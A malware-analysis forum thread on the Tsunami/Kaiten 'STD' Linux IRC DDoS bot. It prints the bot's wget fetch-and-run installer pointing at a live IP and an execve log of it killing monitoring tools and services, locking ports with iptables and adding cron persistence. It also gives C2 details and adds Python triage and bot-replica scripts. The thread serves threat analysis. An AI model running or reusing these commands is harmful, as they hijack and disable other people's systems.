Linux/Tsunami

Forum for analysis and discussion about malware.

Re: Linux/Tsunami

Postby unixfreaxjp » Sun Jan 10, 2016 6:14 pm

unixfreaxjp wrote: (maybe a couple thousand nodes tops, in the overall total of the groups that are using it, like lizard-stresser, kaiten bot, etc.)

If you think I am bullshitting, count the nodes in this paste https://pastebin.com/655ba54R ; all are gayfgt and kaiten (with and without the STD version).
unixfreaxjp
 
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm
Reputation point: 89

Re: Linux/Tsunami

Postby unixfreaxjp » Wed Jan 13, 2016 9:15 pm

loonysquad uses a "lame way" to encode the strings in the version of the Tsunami/kaiten base they call STD bot, and uses encrypted communication to poke the CNC (check-in).
Samples:
https://www.virustotal.com/en/file/4ef7 ... /analysis/
https://www.virustotal.com/en/file/6d87 ... /analysis/
Snapshot: pic1, pic2 (attached)
Tip: read the source code snagged from them about the ktx/STD bot that I shared.
I don't know, maybe I will mention this as ELF.STD.crypted. It's Tsunami base anyway; no need to open a new variant repo.

Re: Linux/Tsunami

Postby unixfreaxjp » Sun Feb 07, 2016 12:52 pm

If anyone needs samples directly from the source, the list is here:

http://blog.malwaremustdie.org/2016/02/ ... ution.html

Re: Linux/Tsunami

Postby unixfreaxjp » Sat Feb 13, 2016 9:44 pm


Re: Linux/Tsunami

Postby unixfreaxjp » Sun Feb 14, 2016 9:49 am

unixfreaxjp wrote: New type. Not a kaiten/tsunami/gayfgt but the same actor...

Nah! I was wrong. The above case is a known kaiten STD bot, apparently the latest version, with multiple PAN and XMAS attacks.
So putting this update in this section is correct.
They built the ELF in a "new way" to avoid string checking and stripped all symbols clean to make it look "new", and that's it ;)
Well, apparently the attempt has failed. But they did succeed in dropping the detection ratio a bit.
PoC:
Before decoding https://www.youtube.com/watch?v=81xg4LTQfI8
After decoding https://www.youtube.com/watch?v=E8gN_XUTCxM

Below is the malware infection work detail (text), shared for the sake of fighting badness on the internet.
Code:
# Some same-ol shitty installer

wget -c http://5.196.8.171/tty0 -P /var/run && chmod +x /var/run/tty0 && /var/run/tty0 &
wget -c http://5.196.8.171/tty1 -P /var/run && chmod +x /var/run/tty1 && /var/run/tty1 &
wget -c http://5.196.8.171/tty2 -P /var/run && chmod +x /var/run/tty2 && /var/run/tty2 &
wget -c http://5.196.8.171/tty3 -P /var/run && chmod +x /var/run/tty3 && /var/run/tty3 &
wget -c http://5.196.8.171/tty4 -P /var/run && chmod +x /var/run/tty4 && /var/run/tty4 &
wget -c http://5.196.8.171/tty5 -P /var/run && chmod +x /var/run/tty5 && /var/run/tty5 &
wget -c http://5.196.8.171/pty -P /var/run && chmod +x /var/run/pty && /var/run/pty &
rm -rf /var/run/1sh

# the ELF bins

2016/02/14  01:21 41,804 c8810d2c967ea872abceacb79d44b145 pty
2016/02/14  01:30 38,856 03db579ac3a28c5acac2253ebc24d3f2 tty0
2016/02/14  01:31 45,544 c54644d5d072122ac8d215fb69ce82d6 tty1
2016/02/14  01:32 41,112 1fc27da0273ce9245d179b9b7f30cd7f tty2
2016/02/14  01:32 49,860 a7764276a8e4a2d0aa51348926556fcb tty3
2016/02/14  01:32 45,452 8cd32ff8bb22e1c61e6eb69aaecdbe89 tty4
2016/02/14  01:32 43,308 fab538b846ac60226eba4f823345d425 tty5

# Multi architecture..lol

pty:  ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
tty0: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
tty1: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
tty2: ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (GNU/Linux), statically linked, stripped
tty3: ELF 32-bit MSB executable, ARM, version 1, statically linked, stripped
tty4: ELF 32-bit LSB executable, ARM, version 1, statically linked, stripped
tty5: ELF 32-bit LSB executable, ARM, version 1, statically linked, stripped

## Some readings...

open("/dev/null");
open("/dev/null");
access("/dev/shm/");
access("/var/tmp/");
access("/var/lock/");
access("/var/run/");
access("/tmp/");
....blah blah...

# PID set

open("/tmp/udevd0.pid", O_RDWR|O_CREAT, 0666);

# /temp preps

open("/tmp/toexec", O_RDONLY) ;

# The STUPID commands part, and PLEASE be STUPID as always :-)) hahaha!

# preventing monitoring..

execve("/bin/sh", ["sh", "-c", "killall -9 tcpdump > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "killall -9 strace > /dev/null 2>&1 &"]

# setting resolve DNS to google

execve("/bin/sh", ["sh", "-c", "echo \"nameserver 8.8.8.8\" > /etc/resolv.conf &"]

# killing fields of services and other ELF malware

execve("/bin/sh", ["sh", "-c", "killall -9 telnetd > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "service httpd stop > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "service telnetd stop > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "service sshd stop > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "killall -9 dropbear > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "killall -9 minihttpd > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "kill -9 `cat /var/run/httpd.pid` > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "kill -9 `cat /var/run/thttpd.pid` > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "nvram set httpd_enable=0 > /dev/null 2>&1"]
execve("/bin/sh", ["sh", "-c", "rm -rf /var/run/wgsh > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "rm -rf /var/run/bbsh > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "rm -rf /var/run/tt* > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "rm -rf /tmp/tt* > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "killall -9 utelnetd > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "killall -9 httpd > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "killall -9 arm > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "killall -9 mips > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "killall -9 mipsel > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "killall -9 powerpc > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "killall -9 ppc > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "killall -9 daemon.armv4l.mod > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "killall -9 daemon.i686.mod > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "killall -9 daemon.mips.mod > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "killall -9 daemon.mipsel.mod > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "rm -rf /tmp/.xs/* > /dev/null 2>&1 &"]

# dropping firewall rules for SSH, TELNET, HTTP and PROXY for remote access..

execve("/bin/sh", ["sh", "-c", "iptables -A INPUT -p tcp --dport 22 -j DROP > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "iptables -A INPUT -p tcp --dport 23 -j DROP > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "iptables -A INPUT -p tcp --dport 80 -j DROP > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "iptables -A INPUT -p tcp --dport 8080 -j DROP > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "chmod 700 /SAMPLE > /dev/null 2>&1 &"]

# grab the hostname

execve("/bin/uname", ["/bin/uname", "-n"]
write(1, "iSCREWskiddos\n", 8)

# installation...

execve("/bin/sh", ["sh", "-c", "(crontab -l | grep -v \"/SAMPLE\" | grep -v \"no cron\" | grep -v \"lesshts/run.sh\" > /var/lock/.x001804289383) > /dev/null 2>&1"]
execve("/bin/sh", ["sh", "-c", "echo \"* * * * * /home/mong/test/cong > /dev/null 2>&1 &\" >> /var/lock/.x001804289383"]
execve("/bin/rm", ["rm", "-rf", "/var/lock/.x001804289383"]

# Boom, connecting to the IRC DDOS Botnet..

=> CONNECT: xxx.pokemoninc.com:8080
=> NICK x86|x|1|50xxxx|iSCREWskiddos
   USER x00 localhost localhost :feb012015
<= PING :FB1681F5
=> PONG :FB1681F5
<= :IRC!IRC@izu.ko PRIVMSG x86|x|1|50xxxx|iSCREWskiddos :1VERSION\1
   :izu.ko 001 x86|x|1|50xxxx|iSCREWskiddos :
   :izu.ko 002 x86|x|1|50xxxx|iSCREWskiddos :
   :izu.ko 003 x86|x|1|50xxxx|iSCREWskiddos :
   :izu.ko 004 x86|x|1|50xxxx|iSCREWskiddos :
   :izu.ko 005 x86|x|1|50xxxx|iSCREWskiddos :
   :izu.ko 005 x86|x|1|50xxxx|iSCREWskiddos :
   :izu.ko 005 x86|x|1|50xxxx|iSCREWskiddos :
   :izu.ko 375 x86|x|1|50xxxx|iSCREWskiddos :
   :izu.ko 372 x86|x|1|50xxxx|iSCREWskiddos :- 27/10/2014 11:36
   :izu.ko 372 x86|x|1|50xxxx|iSCREWskiddos :- !!
   :izu.ko 376 x86|x|1|50xxxx|iSCREWskiddos :
=> NICK x86|x|1|50xxxx|iSCREWskiddos
=> MODE x86|x|1|50xxxx|iSCREWskiddos -xi
=> JOIN #x86 :777
=> NICK x86|x|1|50xxxx|iSCREWskiddos
=> MODE x86|x|1|50xxxx|iSCREWskiddos -xi
=> JOIN #x86 :777
=> NICK x86|x|1|50xxxx|iSCREWskiddos
=> MODE x86|x|1|50xxxx|iSCREWskiddos -xi
=> JOIN #x86 :777
=> NICK x86|x|1|50xxxx|iSCREWskiddos
=> MODE x86|x|1|50xxxx|iSCREWskiddos -xi
=> JOIN #x86 :777
<= :x86|x|1|50xxxx|iSCREWskiddos!x00@1.1.1.1 JOIN :#x86

# yawn...

IPv4 TCP MMD-SCREW-LIZARD-AGAIN -> 211.103.199.98:8080 (ESTABLISHED)

# CNC:

;; QUESTION SECTION:
;xxx.pokemoninc.com.            IN      A

;; ANSWER SECTION:
xxx.pokemoninc.com.     1800    IN      A       211.103.199.98
xxx.pokemoninc.com.     1800    IN      A       203.141.196.14
xxx.pokemoninc.com.     1800    IN      A       61.156.43.106
xxx.pokemoninc.com.     1800    IN      A       202.103.224.85
xxx.pokemoninc.com.     1800    IN      A       83.143.80.227

;; AUTHORITY SECTION:
pokemoninc.com.         3600    IN      NS      dns4.name-services.com.
pokemoninc.com.         3600    IN      NS      dns1.name-services.com.
pokemoninc.com.         3600    IN      NS      dns5.name-services.com.
pokemoninc.com.         3600    IN      NS      dns2.name-services.com.
pokemoninc.com.         3600    IN      NS      dns3.name-services.com.


# MalwareMustDie! analysis by @unixfreaxjp
# Notes: Yow AntiChrist & Co. lizard looniez skeedooh!!, I screw your ELF shits "AGAIN".
# Get a REAL job kiddo! PS: Your linux skill still SUCKS..doubt anyone will hire ya.

#MalwareMustDie!
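Added example (not the poster's code and not taken from the malware): a small Python triage script over the execve() lines in the strace-style log above. It recovers the shell command from each line and sorts the commands into the behaviour classes the post walks through (anti-monitoring, DNS tampering, killing services and rival bots, iptables lockdown, cron persistence). The sample lines are copied from the post; the category names and the regexes are mine.

```python
"""Triage of the execve() lines from the strace-style log in the post above.

Added example, not the poster's or the malware's code. It parses lines of the
form  execve("/bin/sh", ["sh", "-c", "<command>"]  (as strace prints them,
truncated after the argv list like the log in the post), recovers the shell
command and tags it with a behaviour class. Category names are mine.
"""
import re
from collections import defaultdict

EXECVE_RE = re.compile(r'execve\("(?P<path>[^"]+)",\s*\[(?P<argv>.*?)\]')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')   # one double-quoted argv element, escapes allowed

# First matching rule wins, so the more specific classes come first.
RULES = [
    ("anti-monitoring",   re.compile(r"\bkillall\b.*\b(tcpdump|strace)\b")),
    ("dns-tamper",        re.compile(r"/etc/resolv\.conf")),
    ("firewall-lockdown", re.compile(r"\biptables\b.*-j DROP")),
    ("persistence",       re.compile(r"\bcrontab\b|/var/lock/\.x\d+")),
    ("host-recon",        re.compile(r"\buname\b")),
    ("kill-competitors",  re.compile(r"\bkillall\b.*\b(daemon\.\w+\.mod|arm|mips|mipsel|powerpc|ppc)\b"
                                     r"|rm -rf /(tmp|var/run)/")),
    ("kill-services",     re.compile(r"\bservice\b.*\bstop\b|nvram set httpd_enable=0"
                                     r"|/var/run/\w*httpd\.pid"
                                     r"|\bkillall\b.*\b(u?telnetd|minihttpd|httpd|dropbear|sshd)\b")),
]


def parse_execve(line):
    """Return (path, argv) for an execve() log line, or None if it is not one."""
    m = EXECVE_RE.search(line)
    if not m:
        return None
    argv = [a.replace('\\"', '"') for a in ARG_RE.findall(m.group("argv"))]
    return m.group("path"), argv


def shell_command(line):
    """The command actually run: the '-c' string for /bin/sh, else the joined argv."""
    parsed = parse_execve(line)
    if parsed is None:
        return None
    path, argv = parsed
    if path.endswith("/sh") and len(argv) >= 3 and argv[1] == "-c":
        return argv[2]
    return " ".join(argv)


def classify(cmd):
    """Behaviour class of one shell command; 'other' when no rule fires."""
    for tag, rx in RULES:
        if rx.search(cmd):
            return tag
    return "other"


def triage(log_lines):
    """Group the commands found in log_lines by behaviour class."""
    report = defaultdict(list)
    for line in log_lines:
        cmd = shell_command(line)
        if cmd is not None:
            report[classify(cmd)].append(cmd)
    return dict(report)


# Sample input: lines copied from the post above (a subset of the full log).
SAMPLE_LOG = r'''
execve("/bin/sh", ["sh", "-c", "killall -9 tcpdump > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "killall -9 strace > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "echo \"nameserver 8.8.8.8\" > /etc/resolv.conf &"]
execve("/bin/sh", ["sh", "-c", "killall -9 telnetd > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "service sshd stop > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "kill -9 `cat /var/run/httpd.pid` > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "nvram set httpd_enable=0 > /dev/null 2>&1"]
execve("/bin/sh", ["sh", "-c", "rm -rf /var/run/wgsh > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "killall -9 daemon.mipsel.mod > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "iptables -A INPUT -p tcp --dport 22 -j DROP > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "iptables -A INPUT -p tcp --dport 23 -j DROP > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "iptables -A INPUT -p tcp --dport 80 -j DROP > /dev/null 2>&1 &"]
execve("/bin/sh", ["sh", "-c", "iptables -A INPUT -p tcp --dport 8080 -j DROP > /dev/null 2>&1 &"]
execve("/bin/uname", ["/bin/uname", "-n"]
execve("/bin/sh", ["sh", "-c", "(crontab -l | grep -v \"/SAMPLE\" | grep -v \"no cron\" | grep -v \"lesshts/run.sh\" > /var/lock/.x001804289383) > /dev/null 2>&1"]
execve("/bin/sh", ["sh", "-c", "echo \"* * * * * /home/mong/test/cong > /dev/null 2>&1 &\" >> /var/lock/.x001804289383"]
execve("/bin/rm", ["rm", "-rf", "/var/lock/.x001804289383"]
open("/tmp/udevd0.pid", O_RDWR|O_CREAT, 0666);
'''.strip().splitlines()

if __name__ == "__main__":
    for tag, cmds in triage(SAMPLE_LOG).items():
        print(f"[{tag}]")
        for c in cmds:
            print("   ", c)
```

Run it as-is to print the grouped report, or feed triage() real `strace -f -s 4096 -e trace=execve` output from a fresh sample. Rule order matters because the first match wins: the tcpdump/strace kill is listed before the generic service kill so it lands in anti-monitoring, which is the class you most want surfaced during sandboxing.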

Re: Linux/Tsunami

Postby orbett » Mon Mar 14, 2016 6:03 pm

UPX BadLuckJosh Linux/Tsunami, max. 5/57 on VirusTotal.

IP: 149.202.153.56

Code:
9c9ff107486c1517ea450f6f40f70bda190cf1c0
ea3f9409e2346c7d0b39492c493924c07c916f09
63fe884dec6dc728069a45633ec2fa9a9f3a14f9
9f492fcf70cda93c4ed5f1c1095620596a8a61ad
d608a6b835e05ba443d33a522baff87cab45ec6a
241bef4bf1c13e942d92e5c2e714e627d2876c66
33bf638ef82c77cf31218efef9b2a58a5c360c88
c033993593de7cfe45edc862b5c86747280f938e
b1a5f9aec9a28eec00bedaf2e7ed8f0ce571f2d7
3d81efe3c32b6665fd610e4d6ae3ba604958d5f9
9e116703b9408f0ad1a48f8edd99e1592d96ac8b
5a0e334cc6d491ed36ec4f39d0935735aaafe6f6
8381989fdad449d2cbf2f993dd5e870962c0b8d9
cc4febbc9ddf33a6702e1a2800e6e596c2737a2c
757f419ad61038a8fc062f0864e99e059833ed8c
c36dda5f9c93f2cf48513bd96c7a3184b0a337d7
5eb57489e20529c0fc84261f3f8bb79607851eeb
51dc3f52fff6cebbf6ebd2616e6d4540a70200a6
4333b2c8f0cb21222c05458180cd09c60aec769e
e922e80b5d792ac682b4763c24f6112f5320ef73
8fcea554bfd57070677d5c79fddccf5a0c94d30b
26d2834ff062236a629e399aaa002fc5a56c5b84
ded044f476930247e906384b0b9a60169d61d31a
777ea97f87977499aaca6a0f19de2b399388a31f
062d8a413ba318bec73b8dde7004bf4546678d1c
orbett
 
Posts: 1
Joined: Mon Nov 10, 2014 12:55 pm
Reputation point: 0

Re: Linux/Tsunami

Postby unixfreaxjp » Fri Apr 15, 2016 7:42 pm

STD bot modification of x00's cback shell, aka the xxx.pokemon.inc sample.
reference: http://blog.malwaremustdie.org/2016/04/ ... c-bot.html
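Added example, not the bot's or the poster's code: a bot-side parser and replica of the IRC check-in captured in the Feb 14 post above, the same xxx.pokemoninc.com:8080 C&C that this last post refers to as x00's cback shell. parse_irc() splits raw IRC lines, extract_indicators() pulls the C2 endpoint, nick, ident/realname, channel and key out of a capture written in the post's => / <= notation, and BotReplica answers server lines the way the capture shows (PONG to PING, NICK/MODE/JOIN after numeric 376), which is enough to drive a sandbox fake-IRC server. Assumptions: the nick field layout arch|flag|ver|id|hostname is my reading of x86|x|1|50xxxx|iSCREWskiddos (only arch and the uname -n hostname are confirmed by the capture), and the "1VERSION\1" the forum rendered is a CTCP VERSION wrapped in \x01 bytes.

```python
"""Bot-side view of the IRC check-in captured in the Feb 14 post.

Added example, not the bot's or the poster's code. Assumptions: the nick layout
arch|flag|ver|id|hostname is my reading of "x86|x|1|50xxxx|iSCREWskiddos"
(only arch and hostname are confirmed by the capture), and the server's
"1VERSION\\1" line is a CTCP VERSION wrapped in \\x01 bytes.
"""
import re


def parse_irc(line):
    """Split ':prefix CMD arg1 arg2 :trailing' into (prefix, cmd, args, trailing)."""
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    params, sep, trailing = line.partition(" :")
    parts = params.split()
    return prefix, parts[0], parts[1:], (trailing if sep else None)


NICK_RE = re.compile(r"^(?P<arch>[^|]+)\|(?P<flag>[^|]+)\|(?P<ver>[^|]+)\|(?P<id>[^|]+)\|(?P<host>.+)$")


def decode_nick(nick):
    """Fields of the bot nick; names other than arch/host are assumptions."""
    m = NICK_RE.match(nick)
    return m.groupdict() if m else None


def extract_indicators(capture):
    """Defender view: C2 endpoint, nicks, ident/realname, channel->key, server name."""
    ind = {"c2": None, "nicks": set(), "ident": None, "realname": None,
           "channels": {}, "server_name": None}
    direction = None
    for raw in capture:
        raw = raw.strip()
        if not raw:
            continue
        if raw[:2] in ("=>", "<="):            # continuation lines keep the last direction
            direction, raw = raw[:2], raw[2:].strip()
        if raw.startswith("CONNECT:"):
            ind["c2"] = raw.split(":", 1)[1].strip()
            continue
        prefix, cmd, args, trailing = parse_irc(raw)
        if direction == "=>":                   # bot -> server
            if cmd == "NICK":
                ind["nicks"].add(args[0])
            elif cmd == "USER":
                ind["ident"], ind["realname"] = args[0], trailing
            elif cmd == "JOIN":
                ind["channels"][args[0]] = trailing   # channel -> key
        elif direction == "<=" and prefix and "!" not in prefix:
            ind["server_name"] = prefix         # numerics carry the bare server name
    return ind


class BotReplica:
    """State machine reproducing the bot's visible replies, for a sandbox fake-IRC server."""

    def __init__(self, arch, hostname, ident, realname, channel, key):
        self.nick = f"{arch}|x|1|50xxxx|{hostname}"   # assumption: middle fields as seen in the capture
        self.ident, self.realname = ident, realname
        self.channel, self.key = channel, key

    def on_connect(self):
        return [f"NICK {self.nick}", f"USER {self.ident} localhost localhost :{self.realname}"]

    def on_line(self, line):
        prefix, cmd, args, trailing = parse_irc(line)
        if cmd == "PING":
            return [f"PONG :{trailing}"]
        if cmd == "376":                         # end of MOTD: the capture shows NICK/MODE/JOIN here
            return [f"NICK {self.nick}", f"MODE {self.nick} -xi", f"JOIN {self.channel} :{self.key}"]
        return []                                # the capture shows no reply to the CTCP VERSION


# Capture copied from the post, CTCP line written with explicit \x01 bytes (assumption).
CAPTURE = [
    "=> CONNECT: xxx.pokemoninc.com:8080",
    "=> NICK x86|x|1|50xxxx|iSCREWskiddos",
    "   USER x00 localhost localhost :feb012015",
    "<= PING :FB1681F5",
    "=> PONG :FB1681F5",
    "<= :IRC!IRC@izu.ko PRIVMSG x86|x|1|50xxxx|iSCREWskiddos :\x01VERSION\x01",
    "   :izu.ko 001 x86|x|1|50xxxx|iSCREWskiddos :",
    "   :izu.ko 372 x86|x|1|50xxxx|iSCREWskiddos :- 27/10/2014 11:36",
    "   :izu.ko 376 x86|x|1|50xxxx|iSCREWskiddos :",
    "=> NICK x86|x|1|50xxxx|iSCREWskiddos",
    "=> MODE x86|x|1|50xxxx|iSCREWskiddos -xi",
    "=> JOIN #x86 :777",
    "<= :x86|x|1|50xxxx|iSCREWskiddos!x00@1.1.1.1 JOIN :#x86",
]

if __name__ == "__main__":
    print(extract_indicators(CAPTURE))
    bot = BotReplica("x86", "iSCREWskiddos", "x00", "feb012015", "#x86", "777")
    print(bot.on_connect())
    for server_line in ("PING :FB1681F5", ":izu.ko 376 x86|x|1|50xxxx|iSCREWskiddos :"):
        print(server_line, "->", bot.on_line(server_line))
```

The indicators extract_indicators() returns (server:port, channel #x86 with key 777, the USER realname feb012015 and the nick shape) are what goes into a network signature; the replica is the other half, letting a fake server in the sandbox push the bot through registration so the post-JOIN command traffic can be observed.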
